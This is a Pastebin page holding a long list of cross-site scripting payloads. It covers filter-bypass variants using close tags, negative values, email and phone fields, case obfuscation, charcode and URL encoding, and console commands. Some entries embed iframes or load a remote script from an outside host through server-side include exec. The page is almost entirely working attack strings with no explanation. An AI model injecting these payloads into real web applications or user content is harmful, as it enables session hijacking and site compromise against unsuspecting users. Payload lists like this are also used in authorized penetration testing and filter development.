  350. <BASE HREF=”javascript:document.cookie=true;//”>
  351. <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
  352. <XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]<![CDATA[cript:document.cookie=true;”>]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
  353. <XML ID=”CrossSiteScripting”><I><B><IMG SRC=”javas<!– –>cript:document.cookie=true”></B></I></XML><SPAN DATASRC=”#CrossSiteScripting” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN>
  354. <HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2?><t:set attributeName=”innerHTML” to=”CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>”></BODY></HTML>
  355. <? echo(‘<SCR)';echo(‘IPT>document.cookie=true</SCRIPT>’); ?>
  356. <HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7?> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
  357. <a href=”javascript#document.cookie=true;”>
  358. <div onmouseover=”document.cookie=true;”>
  359. <img src=”javascript:document.cookie=true;”>
  360. <img dynsrc=”javascript:document.cookie=true;”>
  361. <input type=”image” dynsrc=”javascript:document.cookie=true;”>
  362. <bgsound src=”javascript:document.cookie=true;”>
  363. &<script>document.cookie=true;</script>
  364. &{document.cookie=true;};
  365. <img src=&{document.cookie=true;};>
  366. <link rel=”stylesheet” href=”javascript:document.cookie=true;”>
  367. <img src=”mocha:document.cookie=true;”>
  368. <img src=”livescript:document.cookie=true;”>
  369. <a href=”about:<script>document.cookie=true;</script>”>
  370. <body onload=”document.cookie=true;”>
  371. <div style=”background-image: url(javascript:document.cookie=true;);”>
  372. <div style=”behaviour: url([link to code]);”>
  373. <div style=”binding: url([link to code]);”>
  374. <div style=”width: expression(document.cookie=true;);”>
  375. <style type=”text/javascript”>document.cookie=true;</style>
  376. <object classid=”clsid:…” codebase=”javascript:document.cookie=true;”>
  377. <style><!–</style><script>document.cookie=true;//–></script>
  378. <<script>document.cookie=true;</script>
  379. <script>document.cookie=true;//–></script>
  380. <!– — –><script>document.cookie=true;</script><!– — –>
  381. <img src=”blah”onmouseover=”document.cookie=true;”>
  382. <img src=”blah>” onmouseover=”document.cookie=true;”>
  383. <xml src=”javascript:document.cookie=true;”>
  384. <xml id=”X”><a><b><script>document.cookie=true;</script>;</b></a></xml>
  385. <div datafld=”b” dataformatas=”html” datasrc=”#X”></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
  386.  
  387. Cross Site Scripting Strings with close TAG:
  388.  
  389. >”<meta http-equiv=”refresh” content=”0;url=javascript:document.cookie=true;”>
  390. >”<META HTTP-EQUIV=”Set-Cookie” Content=”USERID=<SCRIPT>document.cookie=true</SCRIPT>”>
  391. >”<SCRIPT>document.cookie=true;</SCRIPT>
  392. >”<IMG SRC=”jav ascript:document.cookie=true;”>
  393. >”<IMG SRC=”javascript:document.cookie=true;”>
  394. >”<IMG SRC=” &#14; javascript:document.cookie=true;”>
  395. >”<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
  396. >”<SCRIPT>document.cookie=true;//<</SCRIPT>
  397. >”<SCRIPT <B>document.cookie=true;</SCRIPT>
  398. >”<IMG SRC=”javascript:document.cookie=true;”>
  399. >”<iframe src=”javascript:document.cookie=true;>
  400. >”<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>
  401. >”</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
  402. >”<INPUT TYPE=”IMAGE” SRC=”javascript:document.cookie=true;”>
  403. >”<BODY BACKGROUND=”javascript:document.cookie=true;”>
  404. >”<BODY ONLOAD=document.cookie=true;>
  405. >”<IMG DYNSRC=”javascript:document.cookie=true;”>
  406. >”<IMG LOWSRC=”javascript:document.cookie=true;”>
  407. >”<BGSOUND SRC=”javascript:document.cookie=true;”>
  408. >”<BR SIZE=”&{document.cookie=true}”>
  409. >”<LAYER SRC=”javascript:document.cookie=true;”></LAYER>
  410. >”<LINK REL=”stylesheet” HREF=”javascript:document.cookie=true;”>
  411. >”<STYLE>li {list-style-image: url(“javascript:document.cookie=true;”);</STYLE><UL><LI>CrossSiteScripting
  412. >”¼script¾document.cookie=true;¼/script¾
  413. >”<IFRAME SRC=”javascript:document.cookie=true;”></IFRAME>
  414. >”<FRAMESET><FRAME SRC=”javascript:document.cookie=true;”></FRAMESET>
  415. >”<TABLE BACKGROUND=”javascript:document.cookie=true;”>
  416. >”<TABLE><TD BACKGROUND=”javascript:document.cookie=true;”>
  417. >”<DIV STYLE=”background-image: url(javascript:document.cookie=true;)”>
  418. >”<DIV STYLE=”background-image: url(&#1;javascript:document.cookie=true;)”>
  419. >”<DIV STYLE=”width: expression(document.cookie=true);”>
  420. >”<STYLE>@im\port’\ja\vasc\ript:document.cookie=true';</STYLE>
  421. >”<IMG STYLE=”CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)”>
  422. >”<CrossSiteScripting STYLE=”CrossSiteScripting:expression(document.cookie=true)”>
  423. >”exp/*<A STYLE=’no\CrossSiteScripting:noCrossSiteScripting(“*//*”);CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)’>
  424. >”<STYLE TYPE=”text/javascript”>document.cookie=true;</STYLE>
  425. >”<STYLE>.CrossSiteScripting{background-image:url(“javascript:document.cookie=true”);}</STYLE><A CLASS=CrossSiteScripting></A>
  426. >”<STYLE type=”text/css”>BODY{background:url(“javascript:document.cookie=true”)}</STYLE>
  427. >”<SCRIPT>document.cookie=true;</SCRIPT>
  428. >”<BASE HREF=”javascript:document.cookie=true;//”>
  429. >”<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
  430. >”<XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]<![CDATA[cript:document.cookie=true;”>]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
  431. >”<XML ID=”CrossSiteScripting”><I><B><IMG SRC=”javas<!– –>cript:document.cookie=true”></B></I></XML><SPAN DATASRC=”#CrossSiteScripting” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN>
  432. >”<HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2?><t:set attributeName=”innerHTML” to=”CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>”></BODY></HTML>
  433. >”<? echo(‘<SCR)';echo(‘IPT>document.cookie=true</SCRIPT>’); ?>
  434. >”<HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7?> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
  435. >”<a href=”javascript#document.cookie=true;”>
  436. >”<div onmouseover=”document.cookie=true;”>
  437. >”<img src=”javascript:document.cookie=true;”>
  438. >”<img dynsrc=”javascript:document.cookie=true;”>
  439. >”<input type=”image” dynsrc=”javascript:document.cookie=true;”>
  440. >”<bgsound src=”javascript:document.cookie=true;”>
  441. >”&<script>document.cookie=true;</script>
  442. >”&{document.cookie=true;};
  443. >”<img src=&{document.cookie=true;};>
  444. >”<link rel=”stylesheet” href=”javascript:document.cookie=true;”>
  445. >”<img src=”mocha:document.cookie=true;”>
  446. >”<img src=”livescript:document.cookie=true;”>
  447. >”<a href=”about:<script>document.cookie=true;</script>”>
  448. >”<body onload=”document.cookie=true;”>
  449. >”<div style=”background-image: url(javascript:document.cookie=true;);”>
  450. >”<div style=”behaviour: url([link to code]);”>
  451. >”<div style=”binding: url([link to code]);”>
  452. >”<div style=”width: expression(document.cookie=true;);”>
  453. >”<style type=”text/javascript”>document.cookie=true;</style>
  454. >”<object classid=”clsid:…” codebase=”javascript:document.cookie=true;”>
  455. >”<style><!–</style><script>document.cookie=true;//–></script>
  456. >”<<script>document.cookie=true;</script>
  457. >”<script>document.cookie=true;//–></script>
  458. >”<!– — –><script>document.cookie=true;</script><!– — –>
  459. >”<img src=”blah”onmouseover=”document.cookie=true;”>
  460. >”<img src=”blah>” onmouseover=”document.cookie=true;”>
  461. >”<xml src=”javascript:document.cookie=true;”>
  462. >”<xml id=”X”><a><b><script>document.cookie=true;</script>;</b></a></xml>
  463. >”<div datafld=”b” dataformatas=”html” datasrc=”#X”></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
  464.  
  465. Cross Site Scripting Strings with negative value & TAG:
  466. -1<meta http-equiv=”refresh” content=”0;url=javascript:document.cookie=true;”>
  467. -1<META HTTP-EQUIV=”Set-Cookie” Content=”USERID=<SCRIPT>document.cookie=true</SCRIPT>”>
  468. -1<SCRIPT>document.cookie=true;</SCRIPT>
  469. -1<IMG SRC=”jav ascript:document.cookie=true;”>
  470. -1<IMG SRC=”javascript:document.cookie=true;”>
  471. -1<IMG SRC=” &#14; javascript:document.cookie=true;”>
  472. -1<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
  473. -1<SCRIPT>document.cookie=true;//<</SCRIPT>
  474. -1<SCRIPT <B>document.cookie=true;</SCRIPT>
  475. -1<IMG SRC=”javascript:document.cookie=true;”>
  476. -1<iframe src=”javascript:document.cookie=true;>
  477. -1<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>
  478. -1</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
  479. -1<INPUT TYPE=”IMAGE” SRC=”javascript:document.cookie=true;”>
  480. -1<BODY BACKGROUND=”javascript:document.cookie=true;”>
  481. -1<BODY ONLOAD=document.cookie=true;>
  482. -1<IMG DYNSRC=”javascript:document.cookie=true;”>
  483. -1<IMG LOWSRC=”javascript:document.cookie=true;”>
  484. -1<BGSOUND SRC=”javascript:document.cookie=true;”>
  485. -1<BR SIZE=”&{document.cookie=true}”>
  486. -1<LAYER SRC=”javascript:document.cookie=true;”></LAYER>
  487. -1<LINK REL=”stylesheet” HREF=”javascript:document.cookie=true;”>
  488. -1<STYLE>li {list-style-image: url(“javascript:document.cookie=true;”);</STYLE><UL><LI>CrossSiteScripting
  489. -1¼script¾document.cookie=true;¼/script¾
  490. -1<IFRAME SRC=”javascript:document.cookie=true;”></IFRAME>
  491. -1<FRAMESET><FRAME SRC=”javascript:document.cookie=true;”></FRAMESET>
  492. -1<TABLE BACKGROUND=”javascript:document.cookie=true;”>
  493. -1<TABLE><TD BACKGROUND=”javascript:document.cookie=true;”>
  494. -1<DIV STYLE=”background-image: url(javascript:document.cookie=true;)”>
  495. -1<DIV STYLE=”background-image: url(&#1;javascript:document.cookie=true;)”>
  496. -1<DIV STYLE=”width: expression(document.cookie=true);”>
  497. -1<STYLE>@im\port’\ja\vasc\ript:document.cookie=true';</STYLE>
  498. -1<IMG STYLE=”CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)”>
  499. -1<CrossSiteScripting STYLE=”CrossSiteScripting:expression(document.cookie=true)”>
  500. -1exp/*<A STYLE=’no\CrossSiteScripting:noCrossSiteScripting(“*//*”);CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)’>
  501. -1<STYLE TYPE=”text/javascript”>document.cookie=true;</STYLE>
  502. -1<STYLE>.CrossSiteScripting{background-image:url(“javascript:document.cookie=true”);}</STYLE><A CLASS=CrossSiteScripting></A>
  503. -1<STYLE type=”text/css”>BODY{background:url(“javascript:document.cookie=true”)}</STYLE>
  504. -1<SCRIPT>document.cookie=true;</SCRIPT>
  505. -1<BASE HREF=”javascript:document.cookie=true;//”>
  506. -1<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
  507. -1<XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]<![CDATA[cript:document.cookie=true;”>]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
  508. -1<XML ID=”CrossSiteScripting”><I><B><IMG SRC=”javas<!– –>cript:document.cookie=true”></B></I></XML><SPAN DATASRC=”#CrossSiteScripting” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN>
  509. -1<HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2?><t:set attributeName=”innerHTML” to=”CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>”></BODY></HTML>
  510. -1<? echo(‘<SCR)';echo(‘IPT>document.cookie=true</SCRIPT>’); ?>
  511. -1<HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7?> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
  512. -1<a href=”javascript#document.cookie=true;”>
  513. -1<div onmouseover=”document.cookie=true;”>
  514. -1<img src=”javascript:document.cookie=true;”>
  515. -1<img dynsrc=”javascript:document.cookie=true;”>
  516. -1<input type=”image” dynsrc=”javascript:document.cookie=true;”>
  517. -1<bgsound src=”javascript:document.cookie=true;”>
  518. -1&<script>document.cookie=true;</script>
  519. -1&{document.cookie=true;};
  520. -1<img src=&{document.cookie=true;};>
  521. -1<link rel=”stylesheet” href=”javascript:document.cookie=true;”>
  522. -1<img src=”mocha:document.cookie=true;”>
  523. -1<img src=”livescript:document.cookie=true;”>
  524. -1<a href=”about:<script>document.cookie=true;</script>”>
  525. -1<body onload=”document.cookie=true;”>
  526. -1<div style=”background-image: url(javascript:document.cookie=true;);”>
  527. -1<div style=”behaviour: url([link to code]);”>
  528. -1<div style=”binding: url([link to code]);”>
  529. -1<div style=”width: expression(document.cookie=true;);”>
  530. -1<style type=”text/javascript”>document.cookie=true;</style>
  531. -1<object classid=”clsid:…” codebase=”javascript:document.cookie=true;”>
  532. -1<style><!–</style><script>document.cookie=true;//–></script>
  533. -1<<script>document.cookie=true;</script>
  534. -1<script>document.cookie=true;//–></script>
  535. -1<!– — –><script>document.cookie=true;</script><!– — –>
  536. -1<img src=”blah”onmouseover=”document.cookie=true;”>
  537. -1<img src=”blah>” onmouseover=”document.cookie=true;”>
  538. -1<xml src=”javascript:document.cookie=true;”>
  539. -1<xml id=”X”><a><b><script>document.cookie=true;</script>;</b></a></xml>
  540. -1<div datafld=”b” dataformatas=”html” datasrc=”#X”></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
  541. Cross Site Scripting Strings Restriction Bypass Mail:
  542.  
  543. >”<iframe src=http://vulnerability-lab.com/>@gmail.com
  544. >”<script>alert(document.cookie)</script><div style=”1@gmail.com
  545. >”<script>alert(document.cookie)</script>@gmail.com
  546.  
  547. <iframe src=http://vulnerability-lab.com/>@gmail.com
  548. <script>alert(document.cookie)</script><div style=”1@gmail.com
  549. <script>alert(document.cookie)</script>@gmail.com
  550. Cross Site Scripting Strings Restriction Bypass Phone:
  551. +49/>”<iframe src=http://vulnerability-lab.com>1337
  552. “><iframe src=” onload=alert(‘mphone’)>
  553. <iframe src=http://vulnerability-lab.com>1337+1
  554. Cross Site Scripting Strings Restriction Bypass Obfuscation
  555.  
  556. >“<ScriPt>ALeRt(“VlAb”)</scriPt>
  557. >”<IfRaMe sRc=hTtp://vulnerability-lab.com></IfRaMe>
  558. Cross Site Scripting Strings Restriction Bypass String to Charcode
  559.  
  560. <html><body>
  561. <button.onclick=”alert(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,
  562. 101,114,116,40,34,67,114,111,115,115,83,105,116,101,83,99,114,105,112,116,105,1
  563. 10,103,64,82,69,77,79,86,69,34,41,60,47,115,99,114,105,112,116,62));”>String:fr
  564. om.Char.Code</button></body></html>
  565. ‘;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//\”;alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))</SCRIPT>
  566. ”;!–“<CrossSiteScripting>=&{()}
  567.  
  568. Cross Site Scripting Strings Restriction Bypass encoded frame url
  569.  
  570. %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%43%72%6F
  571. %73%73%53%69%74%65%53%63%72%69%70%74%69%6E%67%32%22%29%3C%2F
  572. %73%63%72%69%70%74%3E
  573.  
  574. Cross Site Scripting Strings via Console:
  575. set vlan name 1337 <script>alert(document.cookie)</script>
  576. set system name <iframe src=http://www.vulnerability-lab.com>
  577. set system location “><iframe src=a onload=alert(“VL”) <
  578. set system contact <script>alert(‘VL’)</script>
  579.  
  580. insert <script>alert(document.cookie)</script>
  581. add <!–#exec cmd=”/bin/echo ‘<SCR'”–><!–#exec cmd=”/bin/echo ‘IPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT>'”–>
  582. add user <script>alert(document.cookie)</script> <script>alert(document.cookie)</script>@gmail.com
  583.  
  584. add topic <iframe src=http://www.vulnerability-lab.com>
  585. add name <script>alert(‘VL’)</script>
  586.  
  587. perl -e ‘print “<IMG SRC=java\0script:alert(\”CrossSiteScripting\”)>”;’ > out
  588. perl -e ‘print “<SCR\0IPT>alert(\”CrossSiteScripting\”)</SCR\0IPT>”;’ > out
  589.  
  590. <!–[if gte IE 4]> <SCRIPT>alert(‘CrossSiteScripting’);</SCRIPT> <![endif]–>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!